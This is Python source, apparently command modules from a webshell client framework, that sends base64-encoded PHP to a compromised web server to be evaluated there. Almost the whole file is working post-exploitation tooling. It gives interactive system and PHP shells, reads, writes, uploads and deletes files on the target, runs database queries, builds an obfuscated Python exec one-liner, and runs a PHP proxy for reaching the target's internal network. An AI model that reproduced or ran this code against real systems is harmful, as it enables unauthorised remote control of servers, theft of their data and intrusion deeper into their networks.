def run(*commands):
"""
shell
Get a temporary shell of target system by system function or just run a shell command.
"""
command = str(value_translation(gget("raw_command_args")))
if (command):
res = send(get_system_code(command))
if (not res):
return
print(color.green("\nResult:\n\n") + res.r_text.strip() + "\n")
return
print(
color.cyan(
"Eenter interactive temporary shell...\n\nUse 'back' command to return doughnuts.\n"
))
res = send(
f'{get_system_code("whoami")}print("@".$_SERVER["SERVER_NAME"]."|".getcwd());'
).r_text.strip()
prompt, pwd = res.split("|")
set_namespace("webshell", False, True)
wordlist = gget("webshell.wordlist")
readline.set_wordlist(NEW_WINDOWS_WORDLIST if (
is_windows()) else NEW_UNIX_WORDLIST)
if is_windows():
prompt = "%s> "
else:
prompt = prompt.replace("\r", "").replace("\n", "") + ":%s$ "
try:
while gget("loop"):
print(prompt % pwd, end="")
command = str(value_translation(readline()))
lower_command = command.lower()
if (lower_command.lower() in ['exit', 'quit', 'back']):
print()
break
if (command == ''):
print()
continue
b64_pwd = base64_encode(pwd)
if (lower_command.startswith("cd ") and len(lower_command) > 3):
path = base64_encode(lower_command[3:].strip())
res = send(
f'chdir(base64_decode(\'{b64_pwd}\'));chdir(base64_decode(\'{path}\'));print(getcwd());'
)
if (not res):
return
pwd = res.r_text.strip()
else:
res = send(f'chdir(base64_decode(\'{b64_pwd}\'));' +
get_system_code(command))
if (not res):
return
print("\n" + res.r_text.strip() + "\n")
finally:
readline.set_wordlist(wordlist)
def run(*commands):
"""
webshell
Get a webshell of target system or just run a webshell command.
"""
command = gget("raw_command_args")
if (command):
res = send((command))
if (not res):
return
print(color.green("\nResult:\n\n") + res.r_text.strip() + "\n")
return
print(
color.cyan(
"Eenter interactive temporary webshell...\n\nUse 'back' command to return doughnuts.\n"
))
pwd = send(f'print(getcwd());').r_text.strip()
set_namespace("webshell", False, True)
wordlist = gget("webshell.wordlist")
readline.set_wordlist(NEW_WORDLIST)
try:
while gget("loop"):
print(f"webshell:{pwd} >> ", end="")
data = readline(b"(")
lower_data = data.lower()
if (lower_data.lower() in ['exit', 'quit', 'back']):
print()
break
if (data == ''):
print()
continue
data = base64_encode(data)
b64_pwd = base64_encode(pwd)
if (lower_data.startswith("cd ") and len(lower_data) > 3):
path = base64_encode(lower_data[3:].strip())
res = send(
f'chdir(base64_decode(\'{b64_pwd}\'));chdir(base64_decode(\'{path}\'));print(getcwd());'
)
if (not res):
return
pwd = res.r_text.strip()
else:
res = send(
f'eval("chdir(base64_decode(\'{b64_pwd}\'));eval(base64_decode(\'{data}\'));");'
)
if (not res):
return
print("\n" + res.r_text.strip() + "\n")
finally:
readline.set_wordlist(wordlist)
def run(web_file_path: str, editor: str = ""):
"""
write
Write files directly to the target system by notepad / vi as default or your own editor.
eg: write {web_file_path} {editor=""}
"""
file_name = str(uuid4())
file_path = gget("webshell.download_path", "webshell")
if not path.exists(file_path):
makedirs(file_path)
real_file_path = path.join(file_path, file_name).replace("\\", "/")
open(real_file_path, 'a').close()
open_editor(real_file_path, editor)
with open(real_file_path, "r") as f:
result = base64_encode(f.read())
res = send(
f"print(file_put_contents('{web_file_path}', base64_decode('{result}')));"
)
if (not res):
return
text = res.r_text.strip()
if (match(r"\d+", text)):
print(color.green(f"\nWrite {web_file_path} success.\n"))
else:
print(color.red(f"\nWrite {web_file_path} failed.\n"))
remove(real_file_path)
def get_php(command, database):
connect_type = gget("db_connect_type", "webshell")
connect_code = get_connect_code(dbname=database)
command = base64_encode(command)
if (connect_type == "pdo"):
return """try{%s
$r=$con->query(base64_decode('%s'));
$rows=$r->fetchAll(PDO::FETCH_ASSOC);
foreach($rows[0] as $k=>$v){
echo "$k*,";
}
echo "\\n";
foreach($rows as $array){foreach($array as $k=>$v){echo "$v*,";};echo "\\n";}
} catch (PDOException $e){
die("Connect error: ". $e->getMessage());
}""" % (connect_code, command)
elif (connect_type == "mysqli"):
return """%s
$r=$con->query(base64_decode('%s'));
$rows=$r->fetch_all(MYSQLI_ASSOC);
foreach($rows[0] as $k=>$v){
echo "$k*,";
}
echo "\\n";
foreach($rows as $array){foreach($array as $k=>$v){echo "$v*,";};echo "\\n";}""" % (
connect_code, command)
else:
return ""
def run(web_file_path: str):
"""
write
Write files directly to the target system by notepad/vi.
eg: write {web_file_path}
"""
file_name = path.split(web_file_path)[1]
file_path = gget("webshell.download_path", "webshell").replace(":", "_")
if not path.exists(file_path):
makedirs(file_path)
real_file_path = path.join(file_path, file_name)
with open(real_file_path, "w"):
pass
open_editor(real_file_path)
with open(real_file_path, "r") as f:
result = base64_encode(f.read())
res = send(
f"print(file_put_contents('{web_file_path}', base64_decode('{result}')));"
)
if (not res):
return
text = res.r_text.strip()
if (match(r"\w+", text) and text != '0'):
print(color.green(f"\nWrite {web_file_path} success.\n"))
else:
print(
color.red(f"\nWrite {web_file_path} failed.") +
color.yellow("\n\nResponse:") + f"\n{text}\n")
remove(real_file_path)
def get_php(web_file_path: str, force: bool):
web_file_path = base64_encode(web_file_path)
return """if (isset($_FILES)){
if (%s and file_exists(base64_decode("%s"))){
print("exist");
}
else if (move_uploaded_file($_FILES["file"]["tmp_name"], base64_decode("%s"))){
print("success");
}
}""" % (str(not force).lower(), web_file_path, web_file_path)
def get_php_force(web_file_path: str, force):
web_file_path = base64_encode(web_file_path)
return """if (not is_writable(base64_encode("%s"))) {
echo "not writable";
} else if (%s and file_exists(base64_decode("%s"))){
print("exist");
}
else{
unlink(base64_decode("%s"));
}""" % (web_file_path, str(not force).lower(), web_file_path, web_file_path)
def get_php(web_file_path: str):
return ("""function download($fd){
if (@file_exists($fd)){
$fileinfo = pathinfo($fd);
header("Content-type: application/x-" . $fileinfo["extension"]);
header("Content-Disposition: attachment; filename=" . $fileinfo["basename"]);
@readfile($fd);
}
}
download(base64_decode("%s"));
""" % base64_encode(web_file_path))
def get_data_php(web_file_path: str, offset: int, blocksize: int):
return """function download($file, $offset, $size)
{
$fp = @fopen($file,'rb');
if ($fp){
fseek($fp, $offset);
echo base64_encode(gzdeflate(fread($fp, $size)));
}
}
download(base64_decode("%s"), %s, %s);
""" % (base64_encode(web_file_path), offset, blocksize)
def get_php_decode(web_file_path: str, total_number: int):
web_file_path = base64_encode(web_file_path)
return """function gzipdecode($data)
{
return gzinflate(substr($data,10,-8));
}
$p=base64_decode("%s");
$data="";
$f=true;
for($i=0;$i<%s;$i++){
$pp="$p.tmp$i";if(filesize($pp)!==0){
$data .= file_get_contents($pp);unlink($pp);
} else {
$f=false;
break;
}
}
if($f){
$data=gzipdecode(base64_decode($data));
file_put_contents($p, $data);
if(file_exists($p) && filesize($p) !== 0){echo "success ".md5($data);}
}""" % (web_file_path, total_number)
def get_php_decode(web_file_path: str, number: int):
return """
$p=base64_decode("%s");
$data="";
$f=true;
$fp=@fopen($p, 'wb');
if (fp){
for($i=0;$i<%s;$i++){
$pp="$p.tmp$i";
if(filesize($pp)!==0){
$data=gzinflate(base64_decode(file_get_contents($pp)));
fwrite($fp, $data);
fflush($fp);
unlink($pp);
} else {
$f=false;
break;
}
}
}
fclose($fp);
if($f){
if(file_exists($p) && filesize($p) !== 0){echo "success";}
}""" % (base64_encode(web_file_path), number)
def get_php_clean(web_file_path: str, number: int):
return """for($i=0;$i<%s;$i++){
unlink(base64_decode("%s").".tmp$i");
}""" % (number, base64_encode(web_file_path))
def get_php_upload(web_file_path: str, data: str, number: int):
web_file_path = base64_encode(web_file_path + ".tmp%s" % number)
return """$p=base64_decode("%s");file_put_contents($p, "%s");if(filesize($p) !== 0){echo "success";}""" % (
web_file_path, data)
def get_php(request_target, request_method, request_redirect_method,
request_data, request_params, request_cookie, redirect_auto,
redirect_cookie_use, timeout, type):
return base64_encode("""
# 代理目标
$REQUEST_URL= "%s";
# 代理请求方法
$REQUEST_METHOD= '%s';
# 遇到跳转时的请求方法
$REQUEST_REDIRECT_METHOD = '%s';
# POST数据
$REQUEST_DATA='%s';
# GET数据
$REQUEST_PARAMS='%s';
# COOKIE数据
$REQUEST_COOKIE='%s';
# 是否自动跳转
$REDIRECT_AUTO = %d;
# 跳转时使用自动获取的COOKIE
$REDIRECT_COOKIE_USE = %d;
# 超时时间
$TIMEOUT = %f;
# 有4种。
# 前3种分别对应 socket file_get_contents curl 的内网代理
# 最后1种是单纯的file_get_contents(),可以玩php伪协议
$TYPE = %d;
class Agent{
private $page_content;
private $type;
private $timeout;
private $redirect_auto;
private $redirect_cookie_use;
private $request_method;
private $request_redirect_method;
private $request_allowed_method;
private $request_params;
private $request_data;
private $request_cookie;
private $request_url;
private $request_url_group;
private $current_url;
private $header_data;
private function get_cookie($header_lines){
foreach ($header_lines as $line) {
preg_match_all('/set-cookie:(.*)/i', $line, $cookie);
if (@$cookie[1][0] != NULL) {
return trim($cookie[1][0]);
}
}
return false;
}
private function get_redirect($header_lines){
foreach($header_lines as $line){
preg_match_all('/location:(.*)/i',$line,$url);
if(@$url[1][0]!=NULL){
return trim($url[1][0]);
}
}
return false;
}
private function get_params($params){
$re_params=[];
if($params == '') return [''=>''];
foreach(explode('&',$params) as $line){
$key_value=explode('=',$line);
$re_params[urldecode(isset($key_value[0])?$key_value[0]:'')]=urldecode(isset($key_value[1])?$key_value[1]:'');
}
return $re_params;
}
private function get_query($params_group){
return isset($params_group['']) and $params_group['']=='' ? '' : http_build_query($params_group);
}
private function url_cut($url){
return parse_url($url);
}
private function get_host($url){
$url_group=$this->url_cut($url);
if(isset($url_group['scheme'])){
return $url;
}else{
return $url_group['scheme'].'://'.$url_group['host'].(isset($url_group['port'])?'':':'.$url_group['port']);
}
}
private function get_element($host,$body){
preg_match_all("/<link[\s\S]*?href=['\\"](.*?[.]css.*?)[\\"'][\s\S]*?>/i", $body, $css);
preg_match_all("/<script[\s\S]*?src=['\\"](.*?[.]js.*?)[\\"'][\s\S]*?>/i", $body, $js);
foreach ($css[1] as $css_url) {
$body .= "<style>".@file_get_contents(strpos($css_url, 'http://') == false ? $host . '/' . $css_url:$css_url)."</style>";
}
foreach ($js[1] as $js_url) {
$body .= "<script>" . @file_get_contents(strpos($js_url, 'http://') == false ? $host . '/' . $js_url : $js_url) . "</script>";
}
$body.="\\n<!-- \\n<CurrentUrl>".base64_encode($this->current_url)."</CurrentUrl>";
$body.="<CurrentCookie>".base64_encode($this->request_cookie)."</CurrentCookie>";
$body.="<CurrentHeader>";
if(is_array($this->header_data)){
foreach($this->header_data as $tag){
if($tag){
$body.=base64_encode("[{$tag}]")."|";
}
}
}
$body.="</CurrentHeader>";
$body.="<CurrentStatus>success</CurrentStatus>\\n -->";
return $body;
}
private function get302_socket($url)
{
try {
$result="";
$url_group = $this->url_cut($url);
$fp = @fsockopen($url_group['host'], isset($url_group['port']) ? $url_group['port'] : (isset($this->request_url_group['port']) ? $this->request_url_group['port'] : 80), $erro, $errostr, $this->timeout);
if (!$fp) {
throw new Exception("Can't connect```");
} else {
if(in_array($this->request_redirect_method,$this->request_allowed_method)){
if ($this->request_redirect_method === 'POST') {
$r = 'POST ' . $url_group['path'] . " HTTP/1.1\\r\\n";
$type = "application/x-www-form-urlencoded";
$len = 0;
} else {
$r = 'GET ' . $url_group['path'] . " HTTP/1.1\\r\\n";
$type = '';
$len = 0;
}
}
$r .= "Host: " . $url_group['host'] . ':' . (isset($url_group['port']) ? $url_group['port'] : (isset($this->request_url_group['port']) ? $this->request_url_group['port'] : '80')) . "\r\n";
$r .= $this->request_cookie ? "Cookie: " . $this->request_cookie . "\\r\\n":'';
$r .= "Content-Type: " . $type . "\\r\\n";
$r .= "Content-Length: " . $len . "\\r\\n";
$r .= "Connection: close\\r\\n\\r\\n";
fputs($fp, $r);
while (!feof($fp)) {
$result .= fgets($fp, 1024);
}
fclose($fp);
if ($result) {
list($header, $body) = explode("\\r\\n\\r\\n" , $result, 2);
preg_match("#HTTP/[0-9\.]+\s+([0-9]+)#", explode("\\r\\n", $header)[0], $code);
$header = explode("\\r\\n",$header);
$this->header_data = $header;
if (300 <= $code[1] and $code[1] < 400) {
$redirect_url = $this->get_redirect($header);
$cookie = $this->get_cookie($header) ? $this->get_cookie($header) : $this->request_cookie;
if($this->redirect_cookie_use and $cookie != ''){
$this->request_cookie = $cookie;
}
if(stripos($redirect_url,'http://') == false){
if($redirect_url[0] == '/'){
$redirect_url = $this->get_host($url).$redirect_url;
}else{
$redirect_url = $url_group['scheme'].'://'.$url_group['host']. ':' . (isset($url_group['port']) ? $url_group['port'] : '80').(isset($url_group['path'])?($url_group['path'] == '/'?'/':substr($url_group['path'],0,strripos($url_group['path'],'/') + 1)):'/').$redirect_url;
}
}
$this->current_url = $redirect_url;
return $this->redirect_auto ? $this->get302_socket($redirect_url) : $body;
} else {
return $body;
}
}
}
} catch (Exception $e) {
die("File_Get_Contents_Redirect_error #:" . $e);
}
}
private function get302_fg($url)
{
try {
$url_group = $this->url_cut($url);
if (in_array($this->request_redirect_method, $this->request_allowed_method)) {
if ($this->request_redirect_method === 'POST') {
$type = "application/x-www-form-urlencoded";
}
}
$opts = array(
'http' => array(
'method' => $this->request_method,
'timeout' => $this->timeout,
'header' => 'Content-Type: ' . (isset($type) ? '' : $type) . "\\r\\n" .
'Content-Length: 0' . "\\r\\n".
($this->request_cookie ? 'Cookie: ' . $this->request_cookie . "\\r\\n":'' )
)
);
$context = stream_context_create($opts);
$body = @file_get_contents($url, false, $context);
$result = $http_response_header;
$this->header_data = $result;
preg_match("#HTTP/[0-9\.]+\s+([0-9]+)#", $result[0], $code);
if (300 <= $code[1] and $code[1] < 400) {
$redirect_url = $this->get_redirect($result);
$cookie = $this->get_cookie($result) ? $this->get_cookie($result) : $this->request_cookie;
if($this->redirect_cookie_use and $cookie != ''){
$this->request_cookie = $cookie;
}
if(stripos($redirect_url,'http://') == false){
if($redirect_url[0] == '/'){
$redirect_url = $this->get_host($url).$redirect_url;
}else{
$redirect_url = $url_group['scheme'].'://'.$url_group['host']. ':' . (isset($url_group['port']) ? $url_group['port'] : '80').(isset($url_group['path'])?($url_group['path'] == '/'?'/':substr($url_group['path'],0,strripos($url_group['path'],'/') + 1)):'/').$redirect_url;
}
}
$this->current_url = $redirect_url;
return $this->redirect_auto ? $this->get302_fg($redirect_url) : ($body === false ? "Can't fetch contents```" : $body);
} else {
return $body === false ? "Can't fetch contents```" : $body;
}
} catch (Exception $e) {
die("File_Get_Contents_Redirect_error #:" . $e);
}
}
private function get302_c($url){
try{
$r = curl_init();
$url_group = $this->url_cut($url);
curl_setopt($r, CURLOPT_URL, $url);
curl_setopt($r, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($r, CURLOPT_CONNECTTIMEOUT, $this->timeout);
curl_setopt($r, CURLOPT_HEADER, true);
if($this->request_cookie){
curl_setopt($r,CURLOPT_COOKIE,$this->request_cookie);
}
if(in_array($this->request_redirect_method,$this->request_allowed_method)){
if ($this->request_redirect_method === 'POST') {
curl_setopt($r, CURLOPT_POST, 1);
}
}
$result = curl_exec($r);
if($result){
$header_size = curl_getinfo($r, CURLINFO_HEADER_SIZE);
$header = explode("\\r\\n", substr($result, 0, $header_size));
$body = substr($result, $header_size);
$status_code = intval(curl_getinfo($r, CURLINFO_HTTP_CODE));
$this->header_data = $header;
curl_close($r);
if (300 <= $status_code and $status_code < 400) {
$redirect_url = $this->get_redirect($header);
$cookie = $this->get_cookie($header) ? $this->get_cookie($header) : $this->request_cookie;
if($this->redirect_cookie_use and $cookie != ''){
$this->request_cookie = $cookie;
}
if(stripos($redirect_url,'http://') == false){
if($redirect_url[0] == '/'){
$redirect_url = $this->get_host($url).$redirect_url;
}else{
$redirect_url = $url_group['scheme'].'://'.$url_group['host']. ':' . (isset($url_group['port']) ? $url_group['port'] : '80').(isset($url_group['path'])?($url_group['path'] == '/'?'/':substr($url_group['path'],0,strripos($url_group['path'],'/') + 1)):'/').$redirect_url;
}
}
$this->current_url = $redirect_url;
return $this->redirect_auto ? $this->get302_c($redirect_url) : $body;
}else{
return $body;
}
}
} catch(Exception $e){
die("CURL_Redirect_error #:" . $e);
}
}
public function getContent_sock()
{
try {
$result = '';
$fp = @fsockopen($this->request_url_group['host'], isset($this->request_url_group['port']) ? $this->request_url_group['port'] : 80, $erro, $errostr, $this->timeout);
if (!$fp) {
var_dump($this->request_url_group['scheme'] . '://' . $this->request_url_group['host'] . (isset($this->request_url_group['path']) ? $this->request_url_group['path'] : '/' . '?' . $this->get_query($this->request_params)));
var_dump(isset($this->request_url_group['port']) ? $this->request_url_group['port'] : 80);
throw new Exception("Can't connect```");
} else {
if (in_array($this->request_method, $this->request_allowed_method)) {
if ($this->request_method === 'POST') {
$r = 'POST ' . (isset($this->request_url_group['path']) ? $this->request_url_group['path'] : '/') . '?' . $this->get_query($this->request_params) . " HTTP/1.1\r\n";
$type = "application/x-www-form-urlencoded";
$len = strlen($this->get_query($this->request_data));
} else {
$r = 'GET ' . (isset($this->request_url_group['path']) ? $this->request_url_group['path'] : '/') . '?' . $this->get_query($this->request_params) . " HTTP/1.1\r\n";
$type = '';
$len = 0;
}
}
$r .= "Host: " . $this->request_url_group['host'] . ':' . (isset($this->request_url_group['port']) ? $this->request_url_group['port'] : '80') . "\r\n";
$r .= $this->request_cookie ? "Cookie: " . $this->request_cookie . "\\r\\n" : '';
$r .= "Content-Type: " . $type . "\\r\\n";
$r .= "Content-Length: " . $len . "\\r\\n";
$r .= "Connection: close\\r\\n";
$r .= "\\r\\n" . $this->get_query($this->request_data);
fputs($fp, $r);
while (!feof($fp)) {
$result .= fgets($fp, 1024);
}
fclose($fp);
if ($result) {
list($header, $body) = explode("\\r\\n\\r\\n" , $result, 2);
preg_match("#HTTP/[0-9\.]+\s+([0-9]+)#", explode("\\r\\n", $header)[0], $code);
$header = explode("\\r\\n",$header);
$this->header_data = $header;
if (300 <= $code[1] and $code[1] < 400) {
$redirect_url = $this->get_redirect($header);
$cookie = $this->redirect_cookie_use ? ($this->get_cookie($header) ? $this->get_cookie($header) : $this->request_cookie) : '';
if($this->redirect_cookie_use and $cookie != ''){
$this->request_cookie = $cookie;
}
if(stripos($redirect_url,'http://') == false){
if($redirect_url[0] == '/'){
$redirect_url = $this->get_host($this->request_url).$redirect_url;
}else{
$redirect_url = $this->request_url_group['scheme'].'://'.$this->request_url_group['host']. ':' . (isset($this->request_url_group['port']) ? $this->request_url_group['port'] : '80').(isset($this->request_url_group['path'])?($this->request_url_group['path'] == '/'?'/':substr($this->request_url_group['path'],0,strripos($this->request_url_group['path'],'/') + 1)):'/').$redirect_url;
}
}
$this->current_url = $redirect_url;
return $this->redirect_auto ? $this->get302_socket($redirect_url) : $body;
} else {
return $body;
}
}
}
} catch (Exception $e) {
die("SOCKET_error #:" . $e);
}
}
public function getContent_fg(){
try{
if(in_array($this->request_method,$this->request_allowed_method)){
if($this->request_method === 'POST'){
$type = "application/x-www-form-urlencoded";
}
}
$opts = array(
'http'=>array(
'method' => $this->request_method,
'content' => $this->get_query($this->request_data),
'timeout' => $this->timeout,
'header' => 'Content-Type: '.(isset($type)?'':$type)."\\r\\n".
'Content-Length: '.strlen($this->get_query($this->request_data))."\\r\\n".
($this->request_cookie ? 'Cookie: ' . $this->request_cookie . "\\r\\n" : '')
)
);
$context = stream_context_create($opts);
$body = @file_get_contents($this->request_url.'?'.$this->get_query($this->request_params),false,$context);
$result = $http_response_header;
$this->header_data = $result;
preg_match("#HTTP/[0-9\.]+\s+([0-9]+)#", $result[0], $code);
if (300 <= $code[1] and $code[1] < 400) {
$redirect_url = $this->get_redirect($result);
$cookie = $this->redirect_cookie_use ? ($this->get_cookie($result) ? $this->get_cookie($result) : $this->request_cookie) : '';
if($this->redirect_cookie_use and $cookie != ''){
$this->request_cookie = $cookie;
}
if(stripos($redirect_url,'http://') == false){
if($redirect_url[0] == '/'){
$redirect_url = $this->get_host($this->request_url).$redirect_url;
}else{
$redirect_url = $this->request_url_group['scheme'].'://'.$this->request_url_group['host']. ':' . (isset($this->request_url_group['port']) ? $this->request_url_group['port'] : '80').(isset($this->request_url_group['path'])?($this->request_url_group['path'] == '/'?'/':substr($this->request_url_group['path'],0,strripos($this->request_url_group['path'],'/') + 1)):'/').$redirect_url;
}
}
$this->current_url = $redirect_url;
return $this->redirect_auto ? $this->get302_fg($redirect_url) : ($body===false?"Can't fetch contents```":$body);
}else{
return $body === false ? "Can't fetch contents```" : $body;
}
} catch(Exception $e){
die("File_Get_Contents_error #:" . $e);
}
}
public function getContent_c(){
try{
if(in_array($this->request_method,$this->request_allowed_method)){
$curl = curl_init();
curl_setopt($curl,CURLOPT_URL,$this->request_url.'?'.$this->get_query($this->request_params));
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,$this->timeout);
curl_setopt($curl,CURLOPT_HEADER,true);
if($this->request_cookie){
curl_setopt($curl,CURLOPT_COOKIE,$this->request_cookie);
}
if (in_array($this->request_method, $this->request_allowed_method)) {
if($this->request_method === 'POST'){
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,$this->get_query($this->request_data));
}
}
$result = curl_exec($curl);
if($result){
$header_size = curl_getinfo($curl,CURLINFO_HEADER_SIZE);
$header = explode("\\r\\n",substr($result,0,$header_size));
$body = substr($result,$header_size);
$status_code = intval(curl_getinfo($curl,CURLINFO_HTTP_CODE));
$this->header_data = $header;
curl_close($curl);
if(300 <= $status_code and $status_code < 400){
$redirect_url = $this->get_redirect($header);
$cookie = $this->redirect_cookie_use ? ($this->get_cookie($header) ? $this->get_cookie($header) : $this->request_cookie) : '';
if($this->redirect_cookie_use and $cookie != ''){
$this->request_cookie = $cookie;
}
if(stripos($redirect_url,'http://') == false){
if($redirect_url[0] == '/'){
$redirect_url = $this->get_host($this->request_url).$redirect_url;
}else{
$redirect_url = $this->request_url_group['scheme'].'://'.$this->request_url_group['host']. ':' . (isset($this->request_url_group['port']) ? $this->request_url_group['port'] : '80').(isset($this->request_url_group['path'])?($this->request_url_group['path'] == '/'?'/':substr($this->request_url_group['path'],0,strripos($this->request_url_group['path'],'/') + 1)):'/').$redirect_url;
}
}
$this->current_url = $redirect_url;
return $this->redirect_auto ? $this->get302_c($redirect_url) : $body;
}else{
return $body;
}
}
}
} catch (Exception $e) {
die("CURL_error #:" . $e);
}
}
public function get_content(){
$contents = @file_get_contents($this->request_url);
return $contents === false ? "Can't fetch contents```" : $contents;
}
public function __construct($request_url,$request_method,$request_redirect_method,$redirect_auto,$redirect_cookie_use,$params,$data,$cookie,$timeout,$type){
$this->request_url = $request_url;
$this->request_url_group = $this->url_cut($request_url);
$this->current_url = $request_url;
$this->request_method = $request_method;
$this->request_redirect_method = $request_redirect_method;
$this->redirect_auto = $redirect_auto;
$this->redirect_cookie_use = $redirect_cookie_use;
$this->request_params = $this->get_params($params);
$this->request_data = $this->get_params($data);
$this->request_cookie = $cookie;
$this->request_allowed_method = ['GET','POST'];
$this->timeout = $timeout;
$this->type = $type;
}
public function __toString(){
switch($this->type){
case 1:
$this->page_content = $this->get_element($this->request_url,$this->getContent_sock());
break;
case 2:
$this->page_content = $this->get_element($this->request_url, $this->getContent_fg());
break;
case 3:
$this->page_content = $this->get_element($this->request_url, $this->getContent_c());
break;
case 4:
$this->page_content = $this->get_content();
break;
}
return $this->page_content;
}
}
$this_request = new Agent($REQUEST_URL,$REQUEST_METHOD,$REQUEST_REDIRECT_METHOD,$REDIRECT_AUTO,$REDIRECT_COOKIE_USE,$REQUEST_PARAMS,$REQUEST_DATA,$REQUEST_COOKIE,$TIMEOUT,$TYPE);
echo $this_request;
""" % (request_target, request_method, request_redirect_method, request_data,
request_params, request_cookie, redirect_auto, redirect_cookie_use,
timeout, type))
def oneline_python(code: str):
return '''python -c "exec(\\"exec(__import__('base64').b64decode('%s'.encode()).decode())\\")"''' % base64_encode(code)
def get_php(command, database):
return """%s
$r=$con->query(base64_decode('%s'));
$rows=$r->fetch_all(MYSQLI_ASSOC);
foreach($rows[0] as $k=>$v){
echo "$k*,";
}
echo "\\n";
foreach($rows as $array){foreach($array as $k=>$v){echo "$v*,";};echo "\\n";}""" % (get_connect_code(dbname=database), base64_encode(command))
def get_filesize_php(web_file_path: str):
return """echo filesize(base64_decode("%s"));
""" % (base64_encode(web_file_path))
def get_php(web_file_path):
return """if(unlink(base64_decode("%s"))){echo 'success';}""" % base64_encode(
web_file_path)
